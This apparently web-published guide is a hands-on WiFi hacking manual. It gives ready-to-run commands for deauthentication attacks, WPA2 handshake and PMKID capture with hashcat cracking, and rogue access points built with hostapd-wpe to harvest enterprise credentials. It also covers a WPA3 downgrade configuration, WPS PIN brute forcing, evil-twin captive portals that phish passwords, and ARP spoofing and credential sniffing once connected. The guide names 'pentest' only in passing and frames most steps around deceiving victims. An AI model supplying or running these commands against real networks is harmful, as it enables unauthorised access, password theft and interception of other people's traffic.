How To Hack WiFi Networks (Guide)

How To Hack WiFi Networks

Comprehensive WiFi security assessment methodology. This is a detailed guide on how to hack WiFi networks.

Hardware Requirements

A basic internal WiFi card won't cut it. You need a card that supports monitor mode and packet injection.

bash

# Check if your current card supports monitor mode
iw list | grep -A 10 "Supported interface modes" | grep -E "monitor|AP"

Alfa AWUS036ACM is the current sweet spot. Supports 2.4GHz and 5GHz, AC speeds, reliable monitor mode and injection.

Verify with:

bash

airmon-ng
# Should list your adapter with chipset info

The Protocol Landscape

Phase 1: Reconnaissance

Enable Monitor Mode

bash

# Kill interfering processes
sudo airmon-ng check kill

# Start monitor mode on wlan0
sudo airmon-ng start wlan0

# Verify (interface is now wlan0mon)
iwconfig wlan0mon
# Mode should show "Monitor"

Passive Scanning

bash

# Basic scan
sudo airodump-ng wlan0mon

# Targeted scan — specific channel, output to file
sudo airodump-ng -c 1,6,11 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# 5GHz scan (specify band)
sudo airodump-ng --band a -w capture_5ghz wlan0mon

# GPS-enabled wardriving output
sudo airodump-ng --gpsd -w wardrive wlan0mon

From the airodump output:

• BSSID: MAC address of the AP (tells you manufacturer)

• Channel: Which frequency the AP operates on

• ENC: Security protocol (WPA2, WPA3, WEP, OPN)

• CIPHER: CCMP (AES), TKIP, or GCMP (WPA3)

• AUTH: PSK, MGT (Enterprise), SAE (WPA3), OWE (enhanced open)

• Clients (STATION): Connected devices, their MAC addresses, and probe requests

• Probes: Networks the clients are looking for — this is gold for evil twin attacks

  
  

5GHz vs 2.4GHz

bash

# Your card might only do 2.4GHz in monitor mode. Check:
iw list | grep -A 20 "Frequencies"

# 5GHz has more channels (36-165), less crowded, but shorter range
# 2.4GHz has channels 1-11 (US), 1-13 (EU), 1-14 (Japan)

Phase 2: WPA2-PSK - Handshake Capture

This is the standard attack against most home and small business networks.

The 4-Way Handshake

When a client connects (or reconnects) to a WPA2 network, the four-way handshake exchanges cryptographic material that proves both sides know the pre-shared key. Capturing this handshake gives you the material needed to crack the password offline.

Capture Methods

Method 1: Wait for a client to connect

bash

sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon
# Wait for a client to appear in the STATION column
# Handshake captured when "WPA handshake: AA:BB:CC:DD:EE:FF" appears in top-right

Method 2: Deauthentication attack (force reconnect)

bash

# In terminal 1: capture
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon

# In terminal 2: deauth a specific client
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c CLIENT_MAC wlan0mon

# Or broadcast deauth (all clients, louder)
sudo aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon

-0 = deauthentication, 5 = number of packets, -a = AP MAC, -c = client MAC (optional, omit for broadcast).

The client disconnects briefly, then automatically reconnects. The reconnection triggers the four-way handshake. Terminal 1 captures it. Takes seconds.

PMKID Attack (No Clients Required)

This is the quieter, more modern approach. No deauth needed. No clients needed. Works against most WPA/WPA2 networks that have PMKID enabled (common).

bash

# Step 1: Capture PMKID from the AP
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1

# Let it run. It sends association requests and captures PMKID in the response.
# Press Ctrl+C after a few minutes.

# Step 2: Convert PMKID to hashcat format
hcxpcapngtool -o pmkid.hc22000 pmkid.pcapng

# Step 3: Crack
hashcat -m 22000 pmkid.hc22000 wordlist.txt

The beauty of the PMKID attack: no clients, no deauth, passive to the casual observer. The AP just hands you the crackable material in response to a standard association request.

Phase 3: Cracking the Handshake

Hashcat (GPU — Fast)

bash

# WPA/WPA2 handshake (mode 22000)
hashcat -m 22000 handshake.hc22000 wordlist.txt

# With rules (mutates dictionary)
hashcat -m 22000 handshake.hc22000 wordlist.txt -r /usr/share/hashcat/rules/best64.rule

# Brute force (8 digits — many default router PINs)
hashcat -m 22000 -a 3 handshake.hc22000 ?d?d?d?d?d?d?d?d

# Mask attack (known pattern — e.g., "Company" + 2 digits)
hashcat -m 22000 -a 3 handshake.hc22000 Company?d?d

# With GPU monitoring
hashcat -m 22000 handshake.hc22000 wordlist.txt --status --status-timer=5

John the Ripper (CPU — Slower)

bash

# Convert
hccap2john handshake.hccapx > handshake.john

# Crack
john --wordlist=/usr/share/wordlists/rockyou.txt handshake.john

Optimized Hashcat Workflow

bash

# 1. Convert pcap to hashcat format
hcxpcapngtool -o target.hc22000 -E essidlist target.pcapng

# 2. Quick dictionary pass
hashcat -m 22000 target.hc22000 /usr/share/wordlists/rockyou.txt -O

# 3. Dictionary + best64 rules (finds most human-chosen passwords)
hashcat -m 22000 target.hc22000 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule -O

# 4. Mask attack for 10-digit phone numbers (common ISP router default)
hashcat -m 22000 -a 3 target.hc22000 ?d?d?d?d?d?d?d?d?d?d -O

# 5. Combinator attack (two words combined)
hashcat -m 22000 -a 1 target.hc22000 wordlist.txt wordlist.txt -O

Wordlists

bash

# Rockyou (classic, ~14M passwords)
/usr/share/wordlists/rockyou.txt.gz  # Gunzip first

# SecLists (comprehensive, maintained)
git clone https://github.com/danielmiessler/SecLists.git

# Custom wordlist from target recon
# Combine company names, local sports teams, street names, years, seasons

Phase 4: WPA2-Enterprise Attacks

Corporate networks use RADIUS (802.1X) with username/password or certificate-based auth. The attack is a credential-harvesting rogue AP.

Rogue AP with EAP Credential Capture

bash

# Use hostapd-wpe (Wireless Pwnage Edition)
sudo apt install hostapd-wpe

# Configuration
cat > rogue_enterprise.conf << 'EOF'
interface=wlan0mon
ssid=CorpWiFi
channel=6
hw_mode=g
ieee8021x=1
eap_server=1
eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
ca_cert=/etc/hostapd-wpe/certs/ca.pem
server_cert=/etc/hostapd-wpe/certs/server.pem
private_key=/etc/hostapd-wpe/certs/server.key
private_key_passwd=whatever
dh_file=/etc/hostapd-wpe/certs/dh
wpa=2
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP
EOF

# Launch
sudo hostapd-wpe rogue_enterprise.conf

When a client connects, hostapd-wpe terminates the EAP session at the server-hello, extracts the challenge/response material, and logs it. You get:

• Username (plaintext — it's in the EAP identity response)

• NetNTLMv1 challenge/response (crackable with hashcat mode 5500)

• MSCHAPv2 challenge/response (crackable with hashcat mode 14000)

  
  

bash

# Crack captured MSCHAPv2
hashcat -m 14000 mschapv2.hash wordlist.txt

# Crack NetNTLMv1
hashcat -m 5500 netntlmv1.hash wordlist.txt

Real-World Enterprise Attack Flow

1. Discover the SSID (passive scan — clients probing for "CorpWiFi")
2. Set up rogue AP with same SSID, Enterprise EAP, on a different channel
3. Deauth a client from the real AP
4. Client auto-reconnects to your rogue AP (stronger signal or same SSID)
5. hostapd-wpe captures credentials or challenge/response
6. Crack offline, gain domain credentials

This is devastating when it works. One captured domain user account often leads to full network compromise.

Phase 5: WPA3 Attacks

Dragonblood Downgrade

WPA3's SAE handshake is resistant to offline dictionary attacks. But most WPA3 networks run in "transition mode" (WPA2+WPA3 simultaneously for backward compatibility).

Attack: Downgrade the WPA3 AP to WPA2, then capture the WPA2 handshake.

bash

# 1. Create a rogue AP with same SSID, but WPA2-only
cat > dragonblood.conf << 'EOF'
interface=wlan0mon
ssid=TargetWPA3
channel=6
hw_mode=g
wpa=2
wpa_passphrase=doesntmatter
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
EOF

# 2. Launch rogue AP
sudo hostapd dragonblood.conf

# 3. Deauth client from real WPA3 AP
sudo aireplay-ng -0 10 -a REAL_AP_MAC -c CLIENT_MAC wlan0mon

# 4. Client reconnects to your WPA2 rogue AP, sends WPA2 handshake
# 5. Capture it with airodump-ng on a different interface
# 6. Crack with hashcat (mode 22000)

The client doesn't know it was downgraded. It thinks the real AP just switched to WPA2.

WPA3-SAE Timing Side Channels

Some WPA3 implementations leak timing information during SAE that enables offline dictionary attacks.

Tools:

bash

# DragonSlayer — tests for timing leaks in WPA3 SAE
git clone https://github.com/vanhoefm/dragonslayer
cd dragonslayer
# Requires specific card with firmware modifications

This is more academic/research-grade. For a practical pentest, the transition mode downgrade attack is more reliable.

Phase 6: WPS Attacks

WiFi Protected Setup was designed for easy connectivity with a PIN. The PIN is 8 digits, validated in two halves — making it trivially brute-forceable.

WPS PIN Brute Force

bash

# Check if WPS is enabled
sudo wash -i wlan0mon
# "WPS Locked: No" means it's vulnerable

# Reaver — classic WPS PIN attack
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -vv

# Pixie Dust attack (faster, offline, works on many Ralink/MediaTek/Broadcom chipsets)
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -K 1 -vv

# Bully — alternative to Reaver, sometimes faster
sudo bully wlan0mon -b AA:BB:CC:DD:EE:FF -c 6

The Pixie Dust attack exploits weak randomness in the WPS exchange to compute the PIN offline in seconds. When it works, you get the WPA passphrase in under a minute.

WPS is deprecated in WPA3. But millions of WPA2 APs still have it enabled. It's the fastest way into many networks.

Phase 7: Evil Twin / Captive Portal Attack

For networks where you can't crack the password, you trick users into giving it to you.

bash

# Use Fluxion, Airgeddon, or Wifiphisher
# These automate the full evil twin workflow:

# Airgeddon (Kali)
git clone https://github.com/v1s1t0r1sh3r3/airgeddon
cd airgeddon
sudo bash airgeddon.sh
# Interactive menu guides you through:
# 1. Monitor mode
# 2. Select target AP
# 3. Deauth clients
# 4. Spawn rogue AP with captive portal
# 5. Captured password validated against real AP

Manual Approach with hostapd + dnsmasq + Node/BetterCap

bash

# 1. Create rogue AP (hostapd)
# 2. DHCP server (dnsmasq — gives clients IPs)
# 3. Captive portal (Python Flask or Node.js)
# 4. When user enters password, verify it against the real AP
# 5. If correct, stop the attack and present a "connected" page

The captive portal mimics the real AP's login page. A user connects, gets a "WiFi authentication required" page, enters the password, you capture it, validate it, and your rogue AP disappears. The user connects to the real AP seconds later, thinking there was a glitch.

Phase 8: Post-Connection Attacks

Once you have network access, standard network pentesting applies. WiFi-specific post-connection attacks:

ARP Spoofing / MITM

bash

# BetterCap
sudo bettercap -eval "net.probe on; net.sniff on"

# Or manual
sudo arpspoof -i wlan0 -t VICTIM_IP -r GATEWAY_IP

Credential Sniffing

bash

# BetterCap HTTP/HTTPS credential harvesting
sudo bettercap -eval "net.probe on; http.proxy on; https.proxy on"

# Responder — NTLM hash capture (particularly effective on Windows networks)
sudo responder -I wlan0 -w -v

Network Segmentation Testing

Once on the WiFi, test VLAN hopping, inter-client isolation, and guest-to-corporate network traversal:

bash

# Scan for other networks
nmap -sn 192.168.0.0/16

# Test gateway traversal
ip route show
ping other_subnet_gateway

# VLAN hopping (if 802.1Q is accessible)

Phase 9: KARMA / Probe Request Exploitation

Clients constantly broadcast "probe requests" — "Hey, is WiFi-Network-X here?"

bash

# KARMA attack — respond "YES" to every probe request
# Clients automatically connect

# hostapd with KARMA patch, or use Pwnagotchi

# Passive probe harvesting
sudo airodump-ng wlan0mon --output-format csv -w probes
# Check probes-01.csv for client search history

This reveals:

• Hidden SSIDs (networks configured to not broadcast — but clients broadcast them anyway)

• Networks the target has previously connected to (build an attack list)

• Travel history (airport WiFi, hotel WiFi, conference WiFi)

Quick Reference: Attack Decision Tree

WiFi Network Found
├── WEP? → aircrack-ng (minutes, statistical attack)
├── WPA/WPA2-PSK?
│   ├── WPS enabled? → Reaver / Pixie Dust (minutes)
│   ├── Clients connected? → Deauth + handshake capture + hashcat (hours-days)
│   ├── No clients, PMKID enabled? → hcxdumptool PMKID attack + hashcat
│   └── No clients, no PMKID? → Evil twin + captive portal (social)
├── WPA2-Enterprise?
│   ├── hostapd-wpe rogue AP → capture credentials/hashes
│   └── AS-REP roasting if you get on the network
├── WPA3-Personal?
│   ├── Transition mode? → Downgrade to WPA2 + handshake capture
│   └── Pure WPA3? → DragonSlayer timing attack (if vulnerable implementation)
├── WPA3-Enterprise?
│   └── Transition mode downgrade to WPA2-Enterprise
└── Open Network?
    ├── Captive portal bypass? (MAC spoofing, DNS tunneling)
    └── Direct connection → network scanning

Coworking / Physical Access Angle

If you're in the building with a target device:

bash

# WiFite — automated attack
sudo wifite --kill

# Wifipumpkin3 — full framework
sudo wifipumpkin3

# Pwnagotchi — AI-powered WiFi pwning (runs on Pi Zero W)
# Learns from its environment, automates deauth + handshake capture

Common Pentest Findings to Document